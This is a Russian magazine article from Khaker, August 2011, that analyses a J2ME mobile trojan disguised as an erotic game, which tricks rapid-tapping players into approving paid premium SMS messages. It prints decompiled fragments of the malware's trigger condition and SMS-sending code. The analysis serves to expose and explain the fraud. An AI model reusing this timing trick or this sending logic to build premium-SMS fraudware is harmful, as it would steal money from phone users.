Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР 151, АВГУСТ 2011 г.

Мобильная малварь под микроскопом: Рассматриваем «эротический» J2ME-зловред во всех интимных подробностях

Во всех предыдущих статьях из этой рубрики совсем не упоминались мобильные зловреды. Однако они существуют и, вопреки расхожему мнению, наносят неплохой урон кошельку пользователей. Поэтому в этой статье я разберу троянца для мобильных телефонов, маскирующегося под игру эротического содержания.

Итак, подопытный – зловред под Java 2 Micro Edition (J2ME). Напомню читателям, что именно эту платформу для запуска приложений использует подавляющее большинство обычных мобильных телефонов (это те, которые НЕ смартфоны :)). Ее популярность более чем высока. Прежде чем начать разбор непосредственно файлов, я решил запустить зловред под эмулятором Sjboy. Вот как будет выглядеть экран реального мобильного телефона сразу после запуска сэмпла.

Как мы видим – это приложение позиционирует себя как игра. При этом пользователю любезно сообщается о факте содержания эротического контента. Конечно же, все это сделано исключительно для отвлечения внимания. А теперь – прочитаем правила игры (выдержка, орфография оригинала сохранена):

«Это уникальная эротическая игра на ваш мобильный, которая не имеет аналогов. Цель игры – нужно чем быстрей, тем лучше раcкрыть мозаику из цветных квадратов, для того что бы увидеть спрятанную за ней картинку эротического содержания. Для уничтожения квадратов на экране Вам необходимо нажимать кнопку «Жми»».

Вроде бы, ничего особенного – игра как игра. Но подождите, что там еще написано (выдержка, орфография опять-таки сохранены):

«Дaннaя пpoгpaммa изнaчaльнo coздaнa для peгиcтpaции, кoтopaя oткpывaют вaм дocтyп к плaтнoмy зaкpытoмy apxивy эpoтичecкиx зaгpyзoк, кoтopыe дocтyпны лицaм c 18 и лeт и бoлee. Caмy пpoгpaммy Bы кaчaeтe бecплaтнo, oплaтa пpoиcxoдит тoлькo зa тpaфик пo тapифy вaшeгo oпepaтopa, a зa oтпpaвлeннoe cooбщeниe плaтитe, Bнимaниe cтoимocть cмc cooбщeний oтпpaвкy кoтopыx зaпpocит пpилoжeниe cocтoвляeт: нa нoмepа 5370 ~10.31$ (15 дней), 5373 ~4.57$ (7 дней), 7250 ~3.64$ (3 дня) т.e тeкcт: «cкaчaть бecплaтнo» нa caйтe кacaeтcя тoлькo зaкaчки пpилoжeния, a зa cooбщeния кoтopoe oтcылaeт пpилoжeниe, вы плaтитe. Пpилoжeниe зaпpocит oтпpaвкy sms!!! Чтoбы зapeгиcтpиpoвaтьcя в зaкpытoм эpoтичecкoм apxивe, Bы нaжимaeтe «Дa». Дocтaтoчнo нaжaть oдин paз, нaжмeтe 2 paзa cнимyт co cчeтa, кaк зa 2 sms, и ecли нaжмeтe 3 paзa, тo cyммy cнимyт 3 paзa cooтвecтвeннo. В случае если Вы отправите 3 смс подряд, то Вы получаете дополнительную неделю доступа бесплатно! … »

Так что же получается? Это не игра, а программа для получения доступа к платному контенту?! Кажется, что бояться вроде бы нечего, так как ОС обязательно спрашивает у пользователя, согласен ли он отправить СМС. Но здесь злоумышленники немного схитрили.

Суть игры заключается в том, что нужно очень быстро кликать на кнопку «жми», чтобы успеть открыть картинку. В определенный момент игры появляется подтверждение об отправке СМС, но увлеченный игрок так рьяно жмет на кнопку «жми», что попутно нажимает и кнопку «согласен». Сразу после этого с его счета незамедлительно списывается энное количество денег.

Как это работает?

А теперь – о том, как это работает изнутри. Программы под эту платформу выполнены в виде JAR–файлов. Последние представляют собой обычный ZIP–архив, который можно распаковать. После распаковки мы увидим «файлы», которые используются приложением. Исполнение J2ME-программы начинается с запуска «midlet.class».

Файлы «.class» – это скомпилированный код Java. Можно провести аналогию с файлами, содержащими код на C/C++: «.c”/”.cpp» компилируются в «.obj». Java class’ы можно декомпилировать, например, при помощи JAD. Так я и поступил. Да, у этого зловреда, помимо «midlet.class», присутствовали еще и другие class’ы, с которыми я поступил аналогично.

Первое, что бросилось в глаза – функция sendNextSms. Название, безусловно, говорящее. До этого я говорил, что СМС отправляется не сразу, а в определенные моменты игры. Я решил выяснить, как же это реализовано. Сама функция вызывается в midlet.class следующим образом:

if (e_boolean_fl d)
{
e_boolean_fl d = false;
sendNextSms();
}

Из кода видно, что отправка вызывается только в случае, когда булевая переменная «e_boolean_fld» принимает значение «true». Это происходит только в одном месте в коде:

if(i == b.b && mode > 4 && mode < 6)
{
e.a(e.f, e.g);
if(b.e > 1)
{
while(b.a_int_array2d_static_fl d[rX][rY] == 0)
{
nextX();
nextY();
}
b.a_int_array2d_static_fl d[rX][rY] = 0;
b.e--;
c_int_fl d = 100 — b.f * b.e;
if(c_int_fl d > d_int_fl d)
{
e_boolean_fl d = true;
d_int_fl d = d_int_fl d + 11;
}
nextY();
return;
} else {
a_b_fl d.a(d.a, null);
a_b_fl d.b("Поздравляем!");
a_b_fl d.a(e_java_lang_String_fl d);
e.a(e.g, 0);
a_b_fl d.serviceRepaints();
a_long_fl d = System.currentTimeMillis();
mode = 6;
c_boolean_fl d = true;
return;
}
}

Поскольку исходный код у меня, увы, отсутствует, то о назначении всех переменных приходится догадываться из контекста. Этот фрагмент кода отвечает за обработку пользовательского нажатия по кнопке «жми». Судя по всему, «b.e» – это количество оставшихся квадратов в игре. Если их не осталось, то будет рисоваться поздравление: «a_b_fld.b(«Поздравляем!»);». А если они еще остались, то количество квадратов уменьшится на единицу: b.e--;, и будет произведено дальнейшее рисование «бегающего» элемента. Как видно из кода, булева «e_boolean_fld», которая разрешит отправку SMS, будет выставляться только при определенном условии:

c_int_fld > d_int_fld.

Это условие будет выполняться ближе к концу, когда «b.e» станет очень маленьким, а «c_int_fld», соответственно, большим: c_int_fl d = 100 - b.f * b.e.

Теперь обратимся непосредственно к коду функции sendNextSMS (фрагмент):

String s1 = b_java_lang_String_fl d;
String s = c_java_lang_String_fl d;
c c1 = a_c_fl d;
System.gc();
if(c1.a_java_lang_Thread_fl d == null)
{
c1.a_boolean_fl d = false;
c1.a_java_lang_String_fl d = s1;
c1.b = "sms://" + s;
c1.a_java_lang_Thread_fl d = new Thread(c1);
c1.a_java_lang_Thread_fl d.start();
}
try
{
Thread.sleep(300L);
}
catch(Exception _ex) { }

Здесь происходит заполнение полей объекта «c1». Можно понять, что в строке «s» содержится номер, куда следует отправить SMS, а в строке «s1» содержится текст отправки. После того, как поля объекта становятся заполненными, создается новый поток, которому в качестве параметра передается «c1». Обратимся к этому классу:

MessageConnection messageconnection;
System.gc();
messageconnection = null;
TextMessage textmessage;
(textmessage = (TextMessage)
(messageconnection = (MessageConnection)Connector.open(b)).
newMessage("text")).setAddress(b);
textmessage.setPayloadText(a_java_lang_String_fl d);
messageconnection.send(textmessage);

Я специально вырезал только тот код, который отвечает за отправку сообщения, чтобы не загромождать статью. Мои предположения оказались верными. Так, текст сообщения содержится в строке «a_java_lang_String_fld»: textmessage.setPayloadText(a_java_ lang_String_fl d);. А номер, куда произведена отправка в переменной «b»:

(textmessage = (TextMessage)(messageconnection = (MessageConnection)Connector.open(b)).newMessage("text")).setAddress(b);.

Сама же отправка реализуется посредством следующего вызова: messageconnection.send(textmessage);.

Заключение

Вот и все – мы описали весь «полезный» функционал этой игрытрояна. Оказалось, что любители сомнительного контента могут легко попасться на элементарные уловки злоумышленников. Стоит отметить, что сам троянец выполнен достаточно качественно: по-видимому, на его разработку ушло не так мало времени. Но, что радует, – его разбор оказался совсем несложным.

Содержание
загрузка...
Журнал Хакер #151Журнал Хакер #150Журнал Хакер #149Журнал Хакер #148Журнал Хакер #147Журнал Хакер #146Журнал Хакер #145Журнал Хакер #144Журнал Хакер #143Журнал Хакер #142Журнал Хакер #141Журнал Хакер #140Журнал Хакер #139Журнал Хакер #138Журнал Хакер #137Журнал Хакер #136Журнал Хакер #135Журнал Хакер #134Журнал Хакер #133Журнал Хакер #132Журнал Хакер #131Журнал Хакер #130Журнал Хакер #129Журнал Хакер #128Журнал Хакер #127Журнал Хакер #126Журнал Хакер #125Журнал Хакер #124Журнал Хакер #123Журнал Хакер #122Журнал Хакер #121Журнал Хакер #120Журнал Хакер #119Журнал Хакер #118Журнал Хакер #117Журнал Хакер #116Журнал Хакер #115Журнал Хакер #114Журнал Хакер #113Журнал Хакер #112Журнал Хакер #111Журнал Хакер #110Журнал Хакер #109Журнал Хакер #108Журнал Хакер #107Журнал Хакер #106Журнал Хакер #105Журнал Хакер #104Журнал Хакер #103Журнал Хакер #102Журнал Хакер #101Журнал Хакер #100Журнал Хакер #099Журнал Хакер #098Журнал Хакер #097Журнал Хакер #096Журнал Хакер #095Журнал Хакер #094Журнал Хакер #093Журнал Хакер #092Журнал Хакер #091Журнал Хакер #090Журнал Хакер #089Журнал Хакер #088Журнал Хакер #087Журнал Хакер #086Журнал Хакер #085Журнал Хакер #084Журнал Хакер #083Журнал Хакер #082Журнал Хакер #081Журнал Хакер #080Журнал Хакер #079Журнал Хакер #078Журнал Хакер #077Журнал Хакер #076Журнал Хакер #075Журнал Хакер #074Журнал Хакер #073Журнал Хакер #072Журнал Хакер #071Журнал Хакер #070Журнал Хакер #069Журнал Хакер #068Журнал Хакер #067Журнал Хакер #066Журнал Хакер #065Журнал Хакер #064Журнал Хакер #063Журнал Хакер #062Журнал Хакер #061Журнал Хакер #060Журнал Хакер #059Журнал Хакер #058Журнал Хакер #057Журнал Хакер #056Журнал Хакер #055Журнал Хакер #054Журнал Хакер #053Журнал Хакер #052Журнал Хакер #051Журнал Хакер #050Журнал Хакер #049Журнал Хакер #048Журнал Хакер #047Журнал Хакер #046Журнал Хакер #045Журнал Хакер #044Журнал Хакер #043Журнал Хакер #042Журнал Хакер #041Журнал Хакер #040Журнал Хакер #039Журнал Хакер #038Журнал Хакер #037Журнал Хакер #036Журнал Хакер #035Журнал Хакер #034Журнал Хакер #033Журнал Хакер #032Журнал Хакер #031Журнал Хакер #030Журнал Хакер #029Журнал Хакер #028Журнал Хакер #027Журнал Хакер #026Журнал Хакер #025Журнал Хакер #024Журнал Хакер #023Журнал Хакер #022Журнал Хакер #021Журнал Хакер #020Журнал Хакер #019Журнал Хакер #018Журнал Хакер #017Журнал Хакер #016Журнал Хакер #015Журнал Хакер #014Журнал Хакер #013Журнал Хакер #012Журнал Хакер #011Журнал Хакер #010Журнал Хакер #009Журнал Хакер #008Журнал Хакер #007Журнал Хакер #006Журнал Хакер #005Журнал Хакер #004Журнал Хакер #003Журнал Хакер #002Журнал Хакер #001